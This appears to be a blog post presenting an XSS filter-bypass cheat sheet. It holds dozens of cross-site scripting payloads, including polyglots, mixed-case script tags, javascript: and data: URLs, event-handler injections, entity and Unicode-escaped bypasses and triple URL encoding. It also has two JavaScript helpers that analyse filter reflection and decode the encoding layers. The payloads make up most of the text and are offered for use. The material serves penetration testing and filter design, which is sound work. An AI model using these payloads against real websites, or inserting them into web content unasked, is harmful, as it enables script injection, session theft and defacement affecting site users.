
XSS Filter Bypass Cheat Sheet

As promised, here is the ultimate cheat sheet for bypassing XSS filters.
If you do not understand what I am talking about, read these articles first:

1. Cross Site Scripting (XSS) : Getting Started
2. Bypassing XSS Filters : Part 1
3. Bypassing XSS Filters : Part 2

Quick XSS Payloads

You can use these payloads when you want to quickly check for XSS in a webpage.

Filter Check
Inject this string and look at where it comes back in the raw response: it shows which of the
characters needed for XSS are being filtered or encoded, and whether a literal <script> tag
survives. Compare against view-source or the proxy's response body, not the rendered page,
since the browser decodes entities before displaying them.

/"'`\<><script>:;
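The probe is only useful if you read the result carefully from the raw response. The following script is an added example, not code from the original post: given the fragment of the server's raw response where the probe was reflected, it reports for each probe character whether it came back intact, HTML- or backslash-encoded, or stripped, and what happened to the <script> tag. The function names (analyzeReflection, usableChars) and the encoding table are this example's own choices, and the response fragments used in the checks are constructed, not captured from a real site.

```javascript
// Added example (not part of the original post): classify how each character of
// the filter-check probe came back in the server's raw response.

const PROBE = "/\"'`\\<><script>:;";
// The probe split into the units we want a verdict on.
const PROBE_TOKENS = ['/', '"', "'", '`', '\\', '<', '>', '<script>', ':', ';'];

// Encoded forms a server-side filter commonly substitutes for each probe character
// (HTML character references and backslash escapes used in JavaScript string contexts).
const ENCODED = {
  '"':  ['&quot;', '&#34;', '&#x22;', '\\"'],
  "'":  ['&#39;', '&#x27;', '&apos;', "\\'"],
  '`':  ['&#96;', '&#x60;'],
  '\\': ['\\\\'],
  '<':  ['&lt;', '&#60;', '&#x3c;'],
  '>':  ['&gt;', '&#62;', '&#x3e;'],
  '/':  ['&#47;', '&#x2f;', '\\/'],
  ':':  ['&#58;', '&#x3a;'],
  ';':  ['&#59;', '&#x3b;'],
};

// Consume one probe character at `pos`. Encoded forms are tried before the literal
// because the escaped backslash "\\" starts with the literal "\".
function matchChar(ch, reflected, pos) {
  for (const enc of ENCODED[ch]) {
    if (reflected.startsWith(enc, pos)) return { state: 'encoded', len: enc.length };
  }
  if (reflected[pos] === ch) return { state: 'intact', len: 1 };
  return { state: 'stripped', len: 0 };
}

// The <script> token: an intact tag (any case) is the interesting result; otherwise
// work out whether the brackets were encoded/stripped or the tag name itself removed.
function matchScriptTag(reflected, pos) {
  if (reflected.slice(pos, pos + 8).toLowerCase() === '<script>') {
    return { state: 'intact', len: 8 };
  }
  let len = 0;
  const open = matchChar('<', reflected, pos);
  len += open.len;
  const hasName = reflected.slice(pos + len, pos + len + 6).toLowerCase() === 'script';
  if (hasName) len += 6;
  const close = matchChar('>', reflected, pos + len);
  len += close.len;
  if (open.state === 'stripped' && !hasName && close.state === 'stripped') {
    return { state: 'stripped', len: 0 };          // whole tag removed
  }
  if (!hasName) return { state: 'tag name stripped', len };
  if (open.state === 'encoded' || close.state === 'encoded') return { state: 'encoded', len };
  return { state: 'brackets stripped', len };      // one or both brackets removed
}

// Walk the reflected fragment in probe order and report the fate of each token.
function analyzeReflection(reflected) {
  const report = {};
  let pos = 0;
  for (const tok of PROBE_TOKENS) {
    const m = tok === '<script>' ? matchScriptTag(reflected, pos) : matchChar(tok, reflected, pos);
    report[tok] = m.state;
    pos += m.len;
  }
  return report;
}

// Tokens that came back untouched: the ones a payload can actually use in this context.
function usableChars(reflected) {
  const r = analyzeReflection(reflected);
  return Object.keys(r).filter((t) => r[t] === 'intact');
}

// Constructed response fragments: no filter, HTML-encoding filter, JS-string escaping filter.
console.log(analyzeReflection(PROBE));
console.log(analyzeReflection("/&quot;&#39;`\\&lt;&gt;&lt;script&gt;:;"));
console.log(usableChars("/\\\"\\'`\\\\<>:;"));
```

A character reported as encoded is lost in that reflection context, although it may become usable again if the value is decoded a second time somewhere (the triple-URL-encoding entry further down relies on exactly that); characters reported intact are the ones to build the payload from.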

XSS Tester: Alert XSS Statement
This payload tries to close an enclosing JavaScript string and script block ('; </script>),
then an attribute value and tag (">'>), before injecting a mixed-case script tag that a
case-sensitive filter misses; String.fromCharCode(88,83,83) spells XSS without using quotes.

';</script>">'><SCrIPT>alert(String.fromCharCode(88,83,83))</scRipt>

XSS Polyglot 1
This is my custom payload. It tries to bypass basic filters by first closing whatever context the input lands in (JavaScript string, attribute value, tag) and then chaining several payload types: a visible <marquee> marker, an event handler on a <plaintext> element, an image, and a javascript: URL in an image input. Note that prompt(test) only works if a global named test exists; otherwise it throws a ReferenceError, so use prompt(1) when you want a visible prompt. The javascript: URL in INPUT TYPE=IMAGE SRC is only executed by legacy browsers.

';'>"><marquee>test</marquee><plaintext/onmouseover=prompt(test)>
<img src="https://teamultimate.in/wp-content/uploads/2017/03/slide-main.png">
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">

XSS Polyglot 2

//'/<@/></script></div></script>--><select */onclick=alert()><o>1<o>2')//"<!--

XSS Polyglot 3

<svg onload="void 'javascript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e'; "></svg>

List Of Payloads

No quotes around the attribute value and no semicolon
The attribute value is unquoted and the statement has no trailing semicolon, so it gets past filters that key on =" or ; (the single quotes inside alert() remain; see the next entry for a fully quote-free form). Caveat: javascript: URLs in IMG SRC, TABLE BACKGROUND and INPUT TYPE=IMAGE SRC are only executed by legacy browsers; current browsers ignore them, so treat those entries as checks for old clients rather than as working payloads.

<IMG SRC=javascript:alert('XSS')>

Without any quotes

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

Extra opening bracket to defeat tag matching
A filter that looks for a well-formed <SCRIPT>...</SCRIPT> pair does not match the doubled bracket, while the HTML tokenizer emits the stray < as text and parses the tag normally; the // comments out the second stray < inside the script body.
<<SCRIPT>alert("test");//<</SCRIPT>

Without closing tag
The unquoted SRC value ends at the first space, so B becomes a harmless attribute. The script element still needs an end tag before it runs: it borrows the next </script> that appears later in the page, and everything in between is treated as inline content, which is ignored because src is set.
<SCRIPT SRC=https://xss.rocks/xss.js?< B >

Using body tag

<BODY ONLOAD=alert('XSS')>

Using video tag
The loadstart event fires as soon as the browser starts fetching the bogus source, so no user interaction is needed.
<video src=_ onloadstart="alert(1)">

Using table tag

<TABLE BACKGROUND="javascript:alert('XSS')">

Closing script tag
Use when your input is reflected inside an existing <script> block: the leading </script> ends that block (the HTML tokenizer does not care that the JavaScript in it is now unbalanced) and the fresh <script> that follows is parsed normally.

</script><script>alert(1)</script>

Triple URL Encoding
The attribute name is on URL-encoded three times (%25%32%35... decodes to %25%36%66..., then to %6f%6e, then to on) followed by mouseover. It only becomes onmouseover if the application URL-decodes the input three times before writing it into the page; after fewer decodes the attribute name still contains % signs and the browser ignores it. This is therefore a test for over-eager server-side decoding, not a browser trick.
<b/%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35mouseover=alert(1)>

JSFuck payload
[boom] is a placeholder for the JavaScript you want to run, encoded with JSFuck so that it uses only the six characters []()!+. Use it when a filter blocks letters or quotes but not those characters. The encoded string is long (typically over a thousand characters even for alert(1)), so check the field's length limit first.
<img/src="x"/onerror="[boom]">

Using the onwheel event with the body tag
[DATA] is a placeholder for the script. onwheel fires when the user scrolls with the mouse wheel, and the 1000px height makes sure there is something to scroll.
<body style="height:1000px" onwheel="[DATA]">

Using &NewLine; and &Tab; with the <a> tag
The entities decode to newline and tab characters inside the attribute value, and the URL parser removes ASCII tab and newline from a URL before reading the scheme, so the browser still sees javascript:. The padding defeats filters that look for the literal string javascript:; the bracketed part is a placeholder for a run of those entities.
<a href="j[785 bytes of (&NewLine;&Tab;)]avascript:alert(1);">XSS</a>

Using ondrag with Unicode escapes
\u006e is n and \u006d is m, and JavaScript allows such escapes inside identifiers, so co\u006efir\u006d is confirm and a filter matching the literal word misses it. The leading --> closes an HTML comment in case the input lands in one, <d is an unknown element (any name works), and the slashes stand in for spaces between attributes. The handler fires when the text hello is dragged.
--><d/ /ondrag=co\u006efir\u006d(2)>hello.

Spaces and control characters before the javascript: URL in an image
Old browsers ignored leading whitespace and the control character &#14; in the scheme, which defeats a filter that looks for SRC="javascript:. Like the other javascript: URL in IMG SRC entries, this only works in legacy browsers.
<IMG SRC=" &#14;  javascript:alert('XSS');">
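Several of the entries above (triple URL encoding, &NewLine;/&Tab; inside the scheme, \u escapes in confirm, and the &colon; and &#40; forms in the list that follows) work by pushing a payload through a decoding step the filter did not apply. The following script is an added example, not code from the original post: it reproduces each decoding stage in the order the application and browser apply them, so you can check what text finally reaches the JavaScript engine. Function names (urlDecodeTimes, scriptFromHref and the rest) and the partial entity table are this example's own; the payload strings are the ones from this page.

```javascript
// Added example (not part of the original post): undo the encoding layers used by
// the payloads on this page, in the order the server and the browser undo them.

// Named character references used by the payloads on this page (partial table).
const NAMED_ENTITIES = {
  NewLine: '\n', Tab: '\t', colon: ':', quot: '"', apos: "'", lt: '<', gt: '>',
  amp: '&', equals: '=', lpar: '(', rpar: ')', sol: '/', bsol: '\\',
};

// Lenient percent-decoding: invalid sequences are left alone, as browsers do.
function percentDecode(s) {
  return s.replace(/%([0-9a-f]{2})/gi, (_, hex) => String.fromCharCode(parseInt(hex, 16)));
}

// Stage 1 (server side): URL-decode `times` times, as an over-eager application might.
function urlDecodeTimes(s, times) {
  let out = s;
  for (let i = 0; i < times; i++) out = percentDecode(out);
  return out;
}

// Stage 2 (HTML tokenizer): character references inside an attribute value are
// decoded once, in a single pass.
function decodeHtmlEntities(s) {
  return s.replace(/&(#x[0-9a-f]+|#[0-9]+|[a-z]+);/gi, (whole, body) => {
    if (body[0] === '#') {
      const code = body[1].toLowerCase() === 'x'
        ? parseInt(body.slice(2), 16)
        : parseInt(body.slice(1), 10);
      return String.fromCodePoint(code);
    }
    return Object.prototype.hasOwnProperty.call(NAMED_ENTITIES, body) ? NAMED_ENTITIES[body] : whole;
  });
}

// Stage 3 (URL parser): leading/trailing C0 controls and spaces are trimmed and every
// ASCII tab or newline is removed before the scheme is read. This is why
// j&NewLine;&Tab;avascript: still resolves to javascript:.
function normalizeUrl(url) {
  return url.replace(/^[\x00-\x20]+|[\x00-\x20]+$/g, '').replace(/[\t\n\r]/g, '');
}

// Stage 4 (navigation to a javascript: URL): the text after the scheme is
// percent-decoded and run as script, so confirm%28 1%29 becomes confirm( 1).
function javascriptUrlBody(url) {
  const m = /^javascript:([\s\S]*)$/i.exec(url);
  return m ? percentDecode(m[1]) : null;
}

// Stage 5 (JavaScript parser): \uXXXX escapes are legal inside identifiers, so
// co\u006efir\u006d is the identifier confirm. Simplified: applied to the whole string.
function decodeJsUnicodeEscapes(js) {
  return js.replace(/\\u([0-9a-f]{4})/gi, (_, hex) => String.fromCharCode(parseInt(hex, 16)));
}

// Resolve an href attribute value the way the browser does and return the script that
// would run on click, or null when the result is not a javascript: URL.
function scriptFromHref(hrefAttrValue) {
  const url = normalizeUrl(decodeHtmlEntities(hrefAttrValue));
  const body = javascriptUrlBody(url);
  return body === null ? null : decodeJsUnicodeEscapes(body);
}

// Payload from the "Triple URL Encoding" entry above.
const TRIPLE_ENCODED = '<b/%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35mouseover=alert(1)>';

console.log(urlDecodeTimes(TRIPLE_ENCODED, 2));   // still %6f%6emouseover: not a handler
console.log(urlDecodeTimes(TRIPLE_ENCODED, 3));   // <b/onmouseover=alert(1)>
console.log(scriptFromHref('j&NewLine;&Tab;avascript:alert(1);'));
console.log(scriptFromHref('javascript&colon;co\\u006efir\\u006d&#40;&quot;1&quot;&#41;'));
```

The first thing to check for the triple-encoded payload is how many times the application decodes: after two decodes the attribute name is still %6f%6emouseover, which the browser never decodes, so the handler is never attached. For the href entries, note that stage 3 applies to any URL, which is why modern browsers are strict about javascript: only as a scheme, not about whitespace inside it; the payload defeats the filter's string match, not the browser.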

Here are some other payloads. Most combine the tricks above: a leading "> to break out of an attribute value and tag, entity-encoded punctuation, \u escapes inside identifiers, %0A (newline) or / as attribute separators, and template literals (confirm`1`) in place of parentheses:

"><img src=x onerror=prompt(1)>
"><svg/onload=prompt(1)>
"><iframe/src=javascript:prompt(1)>
"><h1 onclick=prompt(1)>Clickme</h1>
"><a href=javascript:prompt(1)>Clickme</a>
"><a href="javascript:confirm%28 1%29">Clickme</a>
"><a href="data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+">click</a>
"><textarea autofocus onfocus=prompt(1)>
"><a/href=javascript&colon;co\u006efir\u006d&#40;&quot;1&quot;&#41;>clickme</a>
"><script>co\u006efir\u006d`1`</script>
"><ScRiPt>co\u006efir\u006d`1`</ScRiPt>
"><img src=x onerror=co\u006efir\u006d`1`>
"><svg/onload=co\u006efir\u006d`1`>
"><iframe/src=javascript:co\u006efir\u006d%28 1%29>
"><h1 onclick=co\u006efir\u006d(1)>Clickme</h1>
"><a href=javascript:prompt%28 1%29>Clickme</a>
"><a href="javascript:co\u006efir\u006d%28 1%29">Clickme</a>
"><textarea autofocus onfocus=co\u006efir\u006d(1)>
"><details/ontoggle=co\u006efir\u006d`1`>clickmeonchrome
"><p/id=1%0Aonmousemove%0A=%0Aconfirm`1`>hoveme
"><img/src=x%0Aonerror=prompt`1`>
"><iframe srcdoc="&lt;img src&equals;x:x onerror&equals;alert&lpar;1&rpar;&gt;">
"><h1/ondrag=co\u006efir\u006d`1`>DragMe</h1>

The list ends here for now; I will add more payloads later.
Thanks for reading.